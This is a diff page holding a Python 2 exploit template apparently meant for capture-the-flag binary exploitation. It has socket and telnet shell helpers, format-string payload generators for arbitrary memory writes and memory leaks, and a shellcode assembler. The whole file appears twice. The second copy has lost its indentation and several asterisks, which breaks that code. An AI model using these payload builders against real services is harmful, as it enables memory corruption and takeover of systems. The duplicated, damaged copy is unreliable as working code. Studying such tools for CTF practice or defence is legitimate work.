hhc0null · September 15, 2015 14:45
diff --git a/exploit_template.py b/exploit_template.py
 #!/usr/bin/env python2

 import binascii
 import collections
 import hashlib
 import itertools
 import numpy
 import re
 import shlex
 import socket
 import string
 import struct
 import subprocess
 import sys
 import telnetlib
 import time


 def read_until(f, delim='\n'):
    data = ""
    while not data.endswith(delim):
        data += f.read(1)
    return data

 def connect(rhp=("localhost", 1919)):
    s = socket.create_connection(rhp)
    f = s.makefile('rw', bufsize=0)
    return s, f

 def interact(s):
    t = telnetlib.Telnet()
    t.sock = s

    print "[+] 4ll y0U n33D 15 5h3ll!!"
    t.interact()

 def p(x, t="<I"):
    return struct.pack(t, x)

 def u(x, t="<I"):
    return struct.unpack(t, x)[0]

 def unsigned(x):
    return u(p(x, t="<i"), t="<I")

 def fsb_overwrite(index, pairs):
    # convert pairs of address and value to the dataset
    dataset = dict()
    for address, value in pairs:
        x, y = struct.unpack("<HH", struct.pack("<I", value))
        if x not in dataset.keys():
            dataset[x] = set()
        dataset[x].add(address)
        if y not in dataset.keys():
            dataset[y] = set()
        dataset[y].add(address+2)
    dataset = collections.OrderedDict(sorted(dataset.iteritems()))

    # prepare an address part
    addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
    addresses = struct.pack("<"+"I"*len(addresses), *addresses)
    mark = addresses[-4:]

    # prepare format part
    count = 1
    while True:
        formats, previous = "", 0
        for value in dataset.iterkeys():
            if value != 0:
                formats += "%{}x".format(value-previous)
            formats += "%{}$hn".format('#'*count)*len(dataset[value])
            previous = value
        padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
        index_format_ends = index + (formats+padding+addresses).index(mark)/4
        digit = int(numpy.log10(index_format_ends)) + 1
        if count == digit:
            break
        count += 1
    rgx = re.compile("#"*count)
    index_format_begins = index_format_ends - len(addresses)/4 + 1

    # replace substitutions with index of each address
    original_formats_length = len(formats)
    substitution = re.search(rgx, formats)
    while substitution:
        start, end = substitution.start(), substitution.end()
        formats = formats[:start]+str(index_format_begins)+formats[end:]
        index_format_begins += 1
        substitution = re.search(rgx, formats)
    padding += "P"*(original_formats_length-len(formats))

    # finally, generate the payload
    payload = formats + padding + addresses

    return payload

 def fsb_dataleak(index, pairs):
    # prepare a dataset which has leekee as address and leek size as number.
    dataset = dict(pairs)
    
    # prepare format part
    mark = struct.pack("<I", dataset.keys()[-1])
    addresses = "".join(struct.pack("<"+"I"*len(dataset.keys()), *dataset.keys()))
    count = 1
    while True:
        formats = ""
        for address in dataset.iterkeys():
            formats += "%{}${}s".format('#'*count, dataset[address])
        padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
        index_format_ends = index + (formats+padding+addresses).index(mark)/4
        if count == int(numpy.log10(index_format_ends)) + 1:
            break
        count += 1

    # replace substitutions with index of each address
    rgx = re.compile("#"*count)
    original_formats_length = len(formats)
    index_format_begins = index_format_ends - len(dataset.keys()) + 1
    substitution = re.search(rgx, formats)
    while substitution:
        start, end = substitution.start(), substitution.end()
        formats = formats[:start]+str(index_format_begins)+formats[end:]
        index_format_begins += 1
        substitution = re.search(rgx, formats)

    # compensate the padding length.
    padding += "P"*(original_formats_length-len(formats))

    return formats + padding + addresses

 def fsb_stackleak(data, write=True):
    data = data.replace('(nil)', '0x0')
    data = data.split('0x')[1:]
    stack = map(lambda x: int('0x'+x, 16), data)
    if write:
        print map(lambda x: "0x%08x"%(x), stack)
    return stack

 def gen_shellcode(source, bits=32):
    source = "".join([
        "BITS %d\n"%(bits),
        source,
        ])
    filename = hashlib.md5(source).hexdigest()
    with open("/tmp/%s.s"%(filename), "wb") as f:
        f.write(source)
    subprocess.call("nasm /tmp/%s.s -o /tmp/%s"%(filename, filename), shell=True)
    with open("/tmp/%s"%filename, "rb") as f:
        shellcode = f.read()
    return filename, shellcode

 def message(message_type, message_body, value=None):
    text = ""
    if value:
        text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
    else:
        text = "[{}] {}".format(message_type, message_body)
    print text
	#!/usr/bin/env python2

	import binascii
	import collections
	import hashlib
	import itertools
	import numpy
	import re
	import shlex
	import socket
	import string
	import struct
	import subprocess
	import sys
	import telnetlib
	import time


	def read_until(f, delim='\n'):
	data = ""
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def connect(rhp=("localhost", 1919)):
	s = socket.create_connection(rhp)
	f = s.makefile('rw', bufsize=0)
	return s, f

	def interact(s):
	t = telnetlib.Telnet()
	t.sock = s

	print "[+] 4ll y0U n33D 15 5h3ll!!"
	t.interact()

	def p(x, t="<I"):
	return struct.pack(t, x)

	def u(x, t="<I"):
	return struct.unpack(t, x)[0]

	def unsigned(x):
	return u(p(x, t="<i"), t="<I")

	def fsb_overwrite(index, pairs):
	# convert pairs of address and value to the dataset
	dataset = dict()
	for address, value in pairs:
	x, y = struct.unpack("<HH", struct.pack("<I", value))
	if x not in dataset.keys():
	dataset[x] = set()
	dataset[x].add(address)
	if y not in dataset.keys():
	dataset[y] = set()
	dataset[y].add(address+2)
	dataset = collections.OrderedDict(sorted(dataset.iteritems()))

	# prepare an address part
	addresses = sum(map(list, dataset.values()), list()) # nested list comprehension
	addresses = struct.pack("<"+"I"len(addresses), addresses)
	mark = addresses[-4:]

	# prepare format part
	count = 1
	while True:
	formats, previous = "", 0
	for value in dataset.iterkeys():
	if value != 0:
	formats += "%{}x".format(value-previous)
	formats += "%{}$hn".format('#'count)len(dataset[value])
	previous = value
	padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
	index_format_ends = index + (formats+padding+addresses).index(mark)/4
	digit = int(numpy.log10(index_format_ends)) + 1
	if count == digit:
	break
	count += 1
	rgx = re.compile("#"*count)
	index_format_begins = index_format_ends - len(addresses)/4 + 1

	# replace substitutions with index of each address
	original_formats_length = len(formats)
	substitution = re.search(rgx, formats)
	while substitution:
	start, end = substitution.start(), substitution.end()
	formats = formats[:start]+str(index_format_begins)+formats[end:]
	index_format_begins += 1
	substitution = re.search(rgx, formats)
	padding += "P"*(original_formats_length-len(formats))

	# finally, generate the payload
	payload = formats + padding + addresses

	return payload

	def fsb_dataleak(index, pairs):
	# prepare a dataset which has leekee as address and leek size as number.
	dataset = dict(pairs)

	# prepare format part
	mark = struct.pack("<I", dataset.keys()[-1])
	addresses = "".join(struct.pack("<"+"I"len(dataset.keys()), dataset.keys()))
	count = 1
	while True:
	formats = ""
	for address in dataset.iterkeys():
	formats += "%{}${}s".format('#'*count, dataset[address])
	padding = "P"*(4-len(formats)%4) if len(formats)%4 != 0 else ""
	index_format_ends = index + (formats+padding+addresses).index(mark)/4
	if count == int(numpy.log10(index_format_ends)) + 1:
	break
	count += 1

	# replace substitutions with index of each address
	rgx = re.compile("#"*count)
	original_formats_length = len(formats)
	index_format_begins = index_format_ends - len(dataset.keys()) + 1
	substitution = re.search(rgx, formats)
	while substitution:
	start, end = substitution.start(), substitution.end()
	formats = formats[:start]+str(index_format_begins)+formats[end:]
	index_format_begins += 1
	substitution = re.search(rgx, formats)

	# compensate the padding length.
	padding += "P"*(original_formats_length-len(formats))

	return formats + padding + addresses

	def fsb_stackleak(data, write=True):
	data = data.replace('(nil)', '0x0')
	data = data.split('0x')[1:]
	stack = map(lambda x: int('0x'+x, 16), data)
	if write:
	print map(lambda x: "0x%08x"%(x), stack)
	return stack

	def gen_shellcode(source, bits=32):
	source = "".join([
	"BITS %d\n"%(bits),
	source,
	])
	filename = hashlib.md5(source).hexdigest()
	with open("/tmp/%s.s"%(filename), "wb") as f:
	f.write(source)
	subprocess.call("nasm /tmp/%s.s -o /tmp/%s"%(filename, filename), shell=True)
	with open("/tmp/%s"%filename, "rb") as f:
	shellcode = f.read()
	return filename, shellcode

	def message(message_type, message_body, value=None):
	text = ""
	if value:
	text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
	else:
	text = "[{}] {}".format(message_type, message_body)
	print text